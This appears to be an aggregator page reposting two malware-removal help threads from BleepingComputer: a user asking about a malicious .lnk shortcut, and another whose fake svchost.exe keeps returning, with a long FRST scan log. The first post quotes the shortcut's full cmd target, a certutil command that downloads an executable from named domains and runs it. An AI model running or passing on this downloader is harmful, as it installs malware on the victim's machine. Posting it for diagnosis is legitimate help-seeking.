Featured Post

.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Image
.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputerPosted: 06 Jul 2020 11:33 AM PDT Hi all,Looking for feedback on the likelihood my double clicking of a bad .lnk file caused damage.. When I did double click it, I remember getting a standard windows dialog box. I believe it said the path did not exist or shortcut unavailable.. I'm not finding anything in my startup folder for C:\programdata or my username appdata startup folder...  I ran scans with malwarebytes, Hitman with no results.The .lnk file target was:%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1The .lnk file 'start-in' was:"%APPDATA%\Mic…

C:\Windows\svchost.exe keeps reappearing after reboot. - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

C:\Windows\svchost.exe keeps reappearing after reboot. - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer


C:\Windows\svchost.exe keeps reappearing after reboot. - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Posted: 23 Apr 2020 07:15 AM PDT

Hey there,

I have been having trouble with this virus for the past few days. I was able to stop it from running on startup, but keeps reappearing, or being downloaded by another software. I have multiple of these svchost.exe files, and dont know which ones are legit and which ones are fake. If you see anything made by Synapse, I trust it and do not believe that it is causing this problem. Here are the FRST scan notes:

FRST.txt:

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 22-04-2020
Ran by ntbea (administrator) on DESKTOP-O22KKMM (Micro-Star International Co., Ltd. MS-7B79) (23-04-2020 10:14:02)
Running from C:\Users\ntbea\Downloads
Loaded Profiles: ntbea (Available Profiles: ntbea)
Platform: Windows 10 Pro Version 1909 18363.778 (X64) Language: English (United States)
Default browser: Chrome
Boot Mode: Normal
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Advanced Micro Devices, Inc. -> ) C:\Program Files\AMD\Performance Profile Client\RyzenMaster\AUEPRyzenMasterAC.exe
(Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\amdow.exe
(Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\AMDRSServ.exe
(Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSoftware.exe
(Advanced Micro Devices, Inc. -> AMD) C:\Program Files\AMD\Performance Profile Client\AUEPLauncher.exe
(Advanced Micro Devices, Inc. -> AMD) C:\Program Files\AMD\Performance Profile Client\AUEPMaster.exe
(Advanced Micro Devices, Inc. -> AMD) C:\Program Files\AMD\Performance Profile Client\AUEPUF.exe
(Advanced Micro Devices, Inc. -> AMD) C:\Windows\System32\DriverStore\FileRepository\u0353065.inf_amd64_2af28622e162cc90\B353014\atieclxx.exe
(Advanced Micro Devices, Inc. -> AMD) C:\Windows\System32\DriverStore\FileRepository\u0353065.inf_amd64_2af28622e162cc90\B353014\atiesrxx.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(A-Volute -> Nahimic) C:\Windows\System32\NahimicService.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <65>
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsStore_12004.1001.1.0_x64__8wekyb3d8bbwe\WinStore.App.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_5.120.4062.0_x64__8wekyb3d8bbwe\GameBar.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_5.120.4062.0_x64__8wekyb3d8bbwe\GameBarFT.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_5.120.4062.0_x64__8wekyb3d8bbwe\GameBarFTServer.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\regedit.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2004.6-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2004.6-0\NisSrv.exe
(MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) C:\Program Files (x86)\MSI\Dragon Center\APP_Dragon_Center_Keeper.exe
(MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) C:\Program Files (x86)\MSI\Dragon Center\DragonCenter_Service.exe
(MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) C:\Program Files (x86)\MSI\Dragon Center\Mystic_Light\LEDKeeper2.exe
(MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\Dragon Center\Mystic_Light\LightKeeperService.exe
(MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\Dragon Center\Nahimic\NahimicMonitorX64.exe
(MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\Dragon Center\StorageMonitor\StorageMonitor.exe
(MICRO-STAR INTERNATIONAL CO., LTD. -> MSI) C:\Program Files (x86)\MSI\Dragon Center\CC_Engine_x64.exe
(MICRO-STAR INTERNATIONAL CO., LTD. -> MSI) C:\Windows\SysWOW64\muachost.exe <2>
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe <2>
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
==================== Registry (Whitelisted) ===================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [646776 2020-03-12] (Oracle America, Inc. -> Oracle Corporation)
HKLM-x32\...\Run: [TeamsMachineUninstallerLocalAppData] => %LOCALAPPDATA%\Microsoft\Teams\Update.exe --uninstall --msiUninstall --source=default
HKLM-x32\...\Run: [TeamsMachineUninstallerProgramData] => %ProgramData%\Microsoft\Teams\Update.exe --uninstall --msiUninstall --source=default
HKU\S-1-5-21-230749707-3925018352-439227168-1001\...\Run: [OneDrive] => C:\Users\ntbea\AppData\Local\Microsoft\OneDrive\OneDrive.exe [1620840 2020-04-22] () [File not signed]
HKU\S-1-5-21-230749707-3925018352-439227168-1001\...\Run: [Discord] => C:\Users\ntbea\AppData\Local\Discord\app-0.0.306\Discord.exe [90950968 2020-02-24] (Discord Inc. -> Discord Inc.)
HKU\S-1-5-21-230749707-3925018352-439227168-1001\...\Run: [LonelyScreen] => C:\Program Files (x86)\LonelyScreen\lonelyscreen.exe [23353856 2017-10-24] () [File not signed]
HKU\S-1-5-21-230749707-3925018352-439227168-1001\...\Run: [EpicGamesLauncher] => C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [31740816 2020-04-22] (Epic Games Inc. -> Epic Games, Inc.)
GroupPolicy: Restriction ? <==== ATTENTION
==================== Scheduled Tasks (Whitelisted) ============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {0122B8E8-1A76-45F6-A0E2-2439E169B5A2} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2004.6-0\MpCmdRun.exe [485944 2020-04-21] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {01E0BE79-3E8F-4DA1-A83A-95460B12870A} - System32\Tasks\MSISW_Host => C:\Windows\SysWOW64\muachost.exe [1692840 2015-08-18] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI)
Task: {1C80059D-E619-4252-A93D-A789C733EF85} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2004.6-0\MpCmdRun.exe [485944 2020-04-21] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {2C1D5358-B6D8-4CC7-8BB4-0D7193316C8A} - System32\Tasks\Microsoft\VisualStudio\Updates\UpdateConfiguration_S-1-5-21-230749707-3925018352-439227168-1001 => C:\program files (x86)\microsoft visual studio\installer\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\VSIXConfigurationUpdater.exe [23456 2020-04-22] (Microsoft Corporation -> Microsoft)
Task: {4339704C-0009-41D9-8ED7-20382AC55B9A} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe
Task: {46524036-2947-40C9-8158-0D56FFFCB76D} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [61624 2020-03-17] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {46DDEA2E-F05D-40F1-A7A6-01659F29DDA3} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe
Task: {67783823-CB45-42F5-AB22-13127718967A} - System32\Tasks\ModifyLinkUpdate => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [1628160 2020-03-17] (Advanced Micro Devices, Inc.) [File not signed]
Task: {8F6E9D79-9ED9-41E6-9512-ED22FBA884FF} - System32\Tasks\StartDVR => C:\Program Files\AMD\CNext\CNext\RSServCmd.exe [69304 2020-03-17] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {A80F4D74-694E-4100-95E9-F6C01AB6D906} - System32\Tasks\AMDInstallLauncher => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [1628160 2020-03-17] (Advanced Micro Devices, Inc.) [File not signed]
Task: {B0D174FB-65BC-46B1-B5CF-0E0F1DC95285} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe
Task: {B78168F0-1C87-4361-8BD8-602D99A159C4} - System32\Tasks\StartCNBM => C:\Program Files\AMD\CNext\CNext\cncmd.exe [61624 2020-03-17] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {C41C7087-81F5-4985-BEE5-F46EAF04FB64} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2004.6-0\MpCmdRun.exe [485944 2020-04-21] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {DA5A666D-55C4-4410-A58F-0836B3B35F8C} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe
Task: {E896660C-395C-41AA-8D59-8D1FE2854CC4} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2004.6-0\MpCmdRun.exe [485944 2020-04-21] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {F46CD53C-682D-498B-961A-5BD05A52982F} - System32\Tasks\Microsoft\VisualStudio\Updates\BackgroundDownload => C:\Program Files (x86)\Microsoft Visual Studio\Installer\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe [65440 2020-04-22] (Microsoft Corporation -> Microsoft)
Task: {FBBE066C-20B8-44A5-948C-47882D09300D} - System32\Tasks\AMDLinkUpdate => C:\Program Files\AMD\CIM\BIN64\InstallManagerApp.exe [1628160 2020-03-17] (Advanced Micro Devices, Inc.) [File not signed]
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\Windows\Tasks\CreateExplorerShellUnelevatedTask.job => C:\Windows\explorer.exe
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Winsock: Catalog5 08 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [122128 2015-08-12] (Apple Inc. -> Apple Inc.)
Winsock: Catalog5-x64 08 C:\Program Files\Bonjour\mdnsNSP.dll [133392 2015-08-12] (Apple Inc. -> Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 64.233.217.2 64.233.217.3
Tcpip\..\Interfaces\{7eef5dca-5587-4734-80b1-2b5d0da35f9d}: [DhcpNameServer] 64.233.217.2 64.233.217.3
Internet Explorer:
==================
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\Office16\OCHelper.dll => No File
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\root\Office16\GROOVEEX.DLL => No File
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll => No File
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_251\bin\ssv.dll [2020-04-17] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\GROOVEEX.DLL => No File
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_251\bin\jp2ssv.dll [2020-04-17] (Oracle America, Inc. -> Oracle Corporation)
Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL No File
Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL No File
Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL No File
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL No File
Filter: text/xml - {807583E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLMF.DLL No File
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [No File]
FF Plugin-x32: @java.com/DTPlugin,version=11.251.2 -> C:\Program Files (x86)\Java\jre1.8.0_251\bin\dtplugin\npDeployJava1.dll [2020-04-17] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.251.2 -> C:\Program Files (x86)\Java\jre1.8.0_251\bin\plugin2\npjp2.dll [2020-04-17] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [No File]
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [No File]
CHR DefaultProfile: Profile 4
CHR Profile: C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Default [2020-04-23]
CHR Extension: (Slides) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-08-26]
CHR Extension: (Docs) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-08-26]
CHR Extension: (Google Drive) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2019-08-26]
CHR Extension: (YouTube) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-08-26]
CHR Extension: (Honey) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Default\Extensions\bmnlcjabgnpnenekpadlanbbkooimhnj [2020-04-03]
CHR Extension: (Adblock Plus - free ad blocker) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2020-04-06]
CHR Extension: (Sheets) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-08-26]
CHR Extension: (Google Docs Offline) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-04-20]
CHR Extension: (Roblox+) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Default\Extensions\jfbnmfgkohlfclfnplnlenbalpppohkm [2020-04-14]
CHR Extension: (TubeBuddy) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Default\Extensions\mhkhmbddkmdggbhaaaodilponhnccicb [2020-04-17]
CHR Extension: (Chrome Web Store Payments) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-03]
CHR Extension: (Gmail) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-08-26]
CHR Extension: (Chrome Media Router) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-04-20]
CHR Profile: C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Guest Profile [2020-04-20]
CHR Profile: C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 1 [2020-04-23]
CHR Extension: (Slides) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-09-15]
CHR Extension: (Docs) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2019-09-15]
CHR Extension: (Google Drive) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2019-09-15]
CHR Extension: (YouTube) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-09-15]
CHR Extension: (Sheets) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-09-15]
CHR Extension: (Google Docs Offline) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-04-21]
CHR Extension: (AdBlock — best ad blocker) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2020-04-17]
CHR Extension: (Chrome Web Store Payments) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-08]
CHR Extension: (Gmail) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-09-15]
CHR Extension: (Chrome Media Router) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-04-21]
CHR Profile: C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 2 [2020-02-19]
CHR Extension: (Slides) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-11-05]
CHR Extension: (Docs) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aohghmighlieiainnegkcijnfilokake [2019-11-05]
CHR Extension: (Google Drive) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\apdfllckaahabafndbhieahigkjlhalf [2019-11-05]
CHR Extension: (YouTube) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-11-05]
CHR Extension: (Sheets) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-11-05]
CHR Extension: (Google Docs Offline) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-02-17]
CHR Extension: (Chrome Web Store Payments) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-11-05]
CHR Extension: (Gmail) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-11-05]
CHR Extension: (Chrome Media Router) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-02-17]
CHR Profile: C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 3 [2020-03-25]
CHR Extension: (Slides) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2020-02-17]
CHR Extension: (Docs) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\aohghmighlieiainnegkcijnfilokake [2020-02-17]
CHR Extension: (Google Drive) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-02-17]
CHR Extension: (YouTube) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-02-17]
CHR Extension: (Sheets) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2020-02-17]
CHR Extension: (Google Docs Offline) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-03-24]
CHR Extension: (Chrome Web Store Payments) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-02-17]
CHR Extension: (Gmail) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-02-17]
CHR Extension: (Chrome Media Router) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-03-24]
CHR Profile: C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 4 [2020-04-23]
CHR Extension: (Slides) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2020-03-18]
CHR Extension: (Docs) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\aohghmighlieiainnegkcijnfilokake [2020-03-18]
CHR Extension: (Google Drive) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-03-18]
CHR Extension: (YouTube) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-03-18]
CHR Extension: (Sheets) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2020-03-18]
CHR Extension: (Google Docs Offline) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-04-21]
CHR Extension: (Chrome Web Store Payments) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-03-18]
CHR Extension: (Gmail) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-03-18]
CHR Extension: (Chrome Media Router) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 4\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-04-21]
CHR Profile: C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 5 [2020-03-29]
CHR Extension: (Slides) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2020-03-24]
CHR Extension: (Docs) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\aohghmighlieiainnegkcijnfilokake [2020-03-24]
CHR Extension: (Google Drive) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-03-24]
CHR Extension: (YouTube) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-03-24]
CHR Extension: (Sheets) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2020-03-24]
CHR Extension: (Google Docs Offline) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-03-24]
CHR Extension: (Chrome Web Store Payments) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-03-24]
CHR Extension: (Gmail) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-03-24]
CHR Extension: (Chrome Media Router) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 5\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-03-24]
CHR Profile: C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 6 [2020-04-20]
CHR Extension: (Slides) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2020-04-18]
CHR Extension: (Docs) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\aohghmighlieiainnegkcijnfilokake [2020-04-18]
CHR Extension: (Google Drive) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-04-18]
CHR Extension: (YouTube) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-04-18]
CHR Extension: (Sheets) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2020-04-18]
CHR Extension: (Google Docs Offline) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-04-20]
CHR Extension: (Roblox+) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\jfbnmfgkohlfclfnplnlenbalpppohkm [2020-04-18]
CHR Extension: (Chrome Web Store Payments) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-04-18]
CHR Extension: (Gmail) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-04-18]
CHR Extension: (Chrome Media Router) - C:\Users\ntbea\AppData\Local\Google\Chrome\User Data\Profile 6\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-04-18]
